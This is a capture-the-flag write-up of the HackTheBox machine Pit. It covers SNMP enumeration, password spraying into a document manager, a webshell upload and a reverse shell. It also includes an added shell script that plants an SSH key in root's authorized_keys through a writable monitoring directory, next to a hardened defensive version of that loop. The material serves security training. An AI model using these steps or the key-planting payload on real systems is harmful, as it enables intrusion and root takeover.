Pit - HackTheBox
Start with an Nmap scan for open ports.
┌──(root💀kali)-[/home/kali/HTB/Pit/machine]
└─# nmap -sS --min-rate=5000 -vvv -n -Pn --open 10.10.10.241 -oN targeted
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-26 05:01 EDT
Initiating SYN Stealth Scan at 05:01
Scanning 10.10.10.241 [1000 ports]
Discovered open port 80/tcp on 10.10.10.241
Discovered open port 22/tcp on 10.10.10.241
Discovered open port 9090/tcp on 10.10.10.241
Completed SYN Stealth Scan at 05:01, 0.73s elapsed (1000 total ports)
Nmap scan report for 10.10.10.241
Host is up, received user-set (0.071s latency).
Scanned at 2021-09-26 05:01:42 EDT for 1s
Not shown: 997 filtered ports
Reason: 991 no-responses and 6 admin-prohibiteds
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
9090/tcp open zeus-admin syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.82 seconds
Raw packets sent: 1991 (87.604KB) | Rcvd: 9 (564B)
Perform another scan to detect the version of each open service found.
┌──(root💀kali)-[/home/kali/HTB/Pit/machine]
└─# nmap -sC -sV -p22,80,9090 10.10.10.241 -oN webScan
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-26 05:02 EDT
Nmap scan report for 10.10.10.241
Host is up (0.053s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
| 256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_ 256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp open http nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
9090/tcp open ssl/zeus-admin?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad request
| Content-Type: text/html; charset=utf8
| TransferEncoding: chunked
| X-DNS-Prefetch-Control: off
| Referrer-Policy: no-referrer
| X-Content-Type-Options: nosniff
| Cross-Origin-Resource-Policy: same-origin
| <!DOCTYPE html>
| <html>
| <head>
| <title>
| request
| </title>
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <style>
| body {
| margin: 0;
| font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
| font-size: 12px;
| line-height: 1.66666667;
| color: #333333;
| background-color: #f5f5f5;
| border: 0;
| vertical-align: middle;
| font-weight: 300;
|_ margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after: 2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9090-TCP:V=7.91%T=SSL%I=7%D=9/26%Time=61503762%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,E70,"HTTP/1\.1\x20400\x20Bad\x20request\r\nContent-Type:
SF:\x20text/html;\x20charset=utf8\r\nTransfer-Encoding:\x20chunked\r\nX-DN
SF:S-Prefetch-Control:\x20off\r\nReferrer-Policy:\x20no-referrer\r\nX-Cont
SF:ent-Type-Options:\x20nosniff\r\nCross-Origin-Resource-Policy:\x20same-o
SF:rigin\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\x20\x20
SF:<title>\r\nb\r\nBad\x20request\r\nd08\r\n</title>\n\x20\x20\x20\x20<met
SF:a\x20http-equiv=\"Content-Type\"\x20content=\"text/html;\x20charset=utf
SF:-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=de
SF:vice-width,\x20initial-scale=1\.0\">\n\x20\x20\x20\x20<style>\n\tbody\x
SF:20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200;\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-family:\x20\"RedHatDi
SF:splay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20Arial,\x20sans-serif;\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-size:\x2012px;\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20line-height:\x201\.6666666
SF:7;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20color:\x20#333333;\
SF:n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20#
SF:f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20border:\
SF:x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20vertical-align:\
SF:x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-w
SF:eight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20mar
SF:gin:\x200\x200\x2010p")%r(HTTPOptions,E70,"HTTP/1\.1\x20400\x20Bad\x20r
SF:equest\r\nContent-Type:\x20text/html;\x20charset=utf8\r\nTransfer-Encod
SF:ing:\x20chunked\r\nX-DNS-Prefetch-Control:\x20off\r\nReferrer-Policy:\x
SF:20no-referrer\r\nX-Content-Type-Options:\x20nosniff\r\nCross-Origin-Res
SF:ource-Policy:\x20same-origin\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n<
SF:head>\n\x20\x20\x20\x20<title>\r\nb\r\nBad\x20request\r\nd08\r\n</title
SF:>\n\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20content=\"te
SF:xt/html;\x20charset=utf-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\
SF:"\x20content=\"width=device-width,\x20initial-scale=1\.0\">\n\x20\x20\x
SF:20\x20<style>\n\tbody\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20margin:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20fon
SF:t-family:\x20\"RedHatDisplay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20A
SF:rial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20f
SF:ont-size:\x2012px;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20lin
SF:e-height:\x201\.66666667;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20color:\x20#333333;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0background-color:\x20#f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20border:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20vertical-align:\x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20font-weight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20margin:\x200\x200\x2010p");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 192.25 seconds
Nmap found three open ports: SSH on 22, nginx on 80, and a TLS service on 9090 whose certificate names dms-pit.htb. I started with the web server on port 80.

It only served the default nginx test page, so I fuzzed for directories, but found nothing.

Browsing to port 9090 redirected me to a different hostname, which meant name-based virtual hosting was in use (several domains served from the same IP), so I added pit.htb (from the redirect) and dms-pit.htb (from the certificate Nmap showed) to /etc/hosts.

I tried port 9090 again and got a 403 Forbidden.

With nothing interesting on TCP, I moved to UDP. Using udp-proto-scanner.pl I found SNMP open on port 161/udp.

I then ran onesixtyone against it with a cloned wordlist of common community strings, since a valid community string is all SNMPv1/v2c needs to read the MIB tree.

The scan found the default community string public.

With that community string I could walk the tree with snmpwalk, but the default walk showed nothing useful.

After some thought I realised I could pull more by querying specific MIBs. The NET-SNMP-EXTEND-MIB::nsExtendOutputFull table exposes the complete output of commands that snmpd runs through its extend directives, so I walked that MIB.

One of the outputs contained a path that caught my attention.

Testing that path against both web servers, the only one that responded was the one on port 9090.

It was a login panel, so I looked for a public exploit.

I found an exploit that gave remote code execution, but it required an authenticated session in the panel. By password spraying I got in with the username and password michelle, which had shown up in the SNMP enumeration.

Inside the panel there was a folder called Docs.

Inside it was another folder called Users.

That one contained two folders, michelle and Jack. I went into michelle, the user I was authenticated as, and found a section that allowed adding documents.

This was the form that was presented to me.

I entered the webshell's name and selected the file.

And I uploaded it.

I needed the document's ID, which is what appears in the URL.

With that I reached the webshell and had arbitrary command execution.

I tried to spawn a reverse shell, but some restriction on the box prevented it, so I used ttyoverhttp, a tool by s4vitar that gives an interactive shell over a webshell without a fake TTY or a socket back to the attacker; it works through a named pipe created with mkfifo. You only need to paste the webshell's URL into the corresponding field.

I ran it with Python3 and got an interactive shell.

Enumerating the system I found a settings.xml in /var/www/html/seeddms51x/conf that contained credentials.

Those credentials let me log in as michelle to the CentOS Linux web console (Cockpit) login page.

This was the panel.

What caught my attention most was the Terminal section: it is a browser-based shell, from which I could read the user flag and launch a reverse shell back to my machine.

And I received the shell.

PRIVILEGE ESCALATION
For privilege escalation I found the script /usr/bin/monitor.
#!/bin/bash
# Runs every file matching check*sh in /usr/local/monitoring, with no check on
# who owns the directory or the scripts.
for script in /usr/local/monitoring/check*sh
do
/bin/bash $script
done
This reminded me of something from the SNMP enumeration: when I walked NET-SNMP-EXTEND-MIB::nsExtendOutputFull there was a noticeable delay before the results came back, because snmpd was running an extend command on demand, and that command was this same script, /usr/bin/monitor.
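The weakness in /usr/bin/monitor is that it executes anything matching the glob without checking who owns the directory or the files, so a low-privileged user who can write to /usr/local/monitoring gets code run as the snmpd extend command. As an added example (not the box's script, and not part of the original write-up), here is a hardened version of the same loop. It takes the directory and the required owner as parameters (assumptions of mine; the real script hardcodes /usr/local/monitoring and runs as root) so it can be exercised in a scratch directory as an unprivileged user, and it refuses symlinks, wrong owners and group/world-writable paths:

```sh
#!/bin/sh
# Hardened variant of the target's /usr/bin/monitor loop. Added example, not the
# box's own script. Assumptions: DIR and OWNER are parameters (the real script
# hardcodes /usr/local/monitoring and runs as root) so the logic can be tested
# in a scratch directory by an unprivileged user. Requires GNU/busybox stat and find.

# run_checks DIR OWNER
# Runs DIR/check*sh scripts only if DIR and each script are owned by OWNER and
# are not group/world writable; symlinks are skipped. Sets RUN_CHECKS_COUNT to
# the number of scripts executed and RUN_CHECKS_SKIPPED to the number refused.
run_checks() {
    dir="$1"
    owner="$2"
    RUN_CHECKS_COUNT=0
    RUN_CHECKS_SKIPPED=0

    # A writable or foreign-owned directory lets anyone drop a new check script.
    if [ -L "$dir" ] \
        || [ "$(stat -c %U "$dir")" != "$owner" ] \
        || [ -n "$(find "$dir" -maxdepth 0 -perm /022)" ]; then
        echo "refusing to run: $dir is not a trusted directory" >&2
        return 1
    fi

    for script in "$dir"/check*sh; do
        [ -e "$script" ] || continue          # glob matched nothing
        if [ -L "$script" ] \
            || [ "$(stat -c %U "$script")" != "$owner" ] \
            || [ -n "$(find "$script" -maxdepth 0 -perm /022)" ]; then
            echo "skipping $script: untrusted owner or permissions" >&2
            RUN_CHECKS_SKIPPED=$((RUN_CHECKS_SKIPPED + 1))
            continue
        fi
        /bin/sh "$script" || echo "$script exited non-zero" >&2
        RUN_CHECKS_COUNT=$((RUN_CHECKS_COUNT + 1))
    done
    return 0
}

# On the real box this would be called as: run_checks /usr/local/monitoring root
```

The ownership and write-bit checks are the ones that would have stopped the attack on this box: a script dropped by michelle would be skipped, and a monitoring directory writable by her would abort the run entirely.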

So there had to be a connection: snmpd runs the extend command as root, and /usr/bin/monitor in turn runs every script named check followed by anything and ending in sh under /usr/local/monitoring, so any check*sh script I could place there would run as root. My plan was to generate an SSH key pair with ssh-keygen and write a script that appends the public key to /root/.ssh/authorized_keys, so that root could then be reached over SSH without a password. I generated the keys first.

Then I created the script, transferred it to /usr/local/monitoring, and walked NET-SNMP-EXTEND-MIB::nsExtendOutputFull again; the walk made snmpd run /usr/bin/monitor, which executed my script, and I could SSH in as root with the private key and read the root flag.
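The following is an added example, not code from the original write-up: it packages the two SNMP steps above (the nsExtendOutputFull walk used for enumeration, and the same walk used to trigger /usr/bin/monitor) together with a generator for the check*sh payload. Facts taken from this box are the target 10.10.10.241, the community string public, the extend MIB, and the /usr/local/monitoring/check*sh naming. The key file name pit_root, the script name check_ssh.sh and the assumption that snmpd's extend command runs as root are my own.

```sh
#!/bin/sh
# Added example, not the original write-up's code. Facts from the box: target
# 10.10.10.241, community "public", NET-SNMP-EXTEND-MIB::nsExtendOutputFull runs
# /usr/bin/monitor, which runs /usr/local/monitoring/check*sh. Assumptions (mine):
# key name pit_root, payload name check_ssh.sh, snmpd runs the extend command as root.

# make_check_script PUBKEY_FILE OUT_FILE
# Writes a script whose name must match the check*sh glob; when /usr/bin/monitor
# runs it as root it installs PUBKEY_FILE into root's authorized_keys.
make_check_script() {
    pubkey=$(cat "$1")
    cat > "$2" <<EOF
#!/bin/bash
# Runs as root when snmpd's extend entry executes /usr/bin/monitor.
mkdir -p /root/.ssh
chmod 700 /root/.ssh
echo '$pubkey' >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
EOF
    chmod 755 "$2"
}

# trigger_cmd TARGET [COMMUNITY]
# Prints the snmpwalk used both to enumerate the extend output and to fire the
# payload: snmpd runs the extend command when the table is queried, so every
# walk executes /usr/bin/monitor and therefore every check*sh script.
trigger_cmd() {
    echo "snmpwalk -v2c -c ${2:-public} $1 NET-SNMP-EXTEND-MIB::nsExtendOutputFull"
}

# Usage on the attacking host (not executed when this file is sourced):
#   ssh-keygen -t ed25519 -N '' -f pit_root
#   make_check_script pit_root.pub check_ssh.sh
#   # copy check_ssh.sh to /usr/local/monitoring/ on the target from the foothold shell
#   $(trigger_cmd 10.10.10.241)
#   ssh -i pit_root root@10.10.10.241
```

The payload name matters: /usr/bin/monitor only picks up files matching check*sh, so check_ssh.sh works while ssh_check.sh would be ignored. The generated script uses bash, which is what /usr/bin/monitor invokes on each file.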
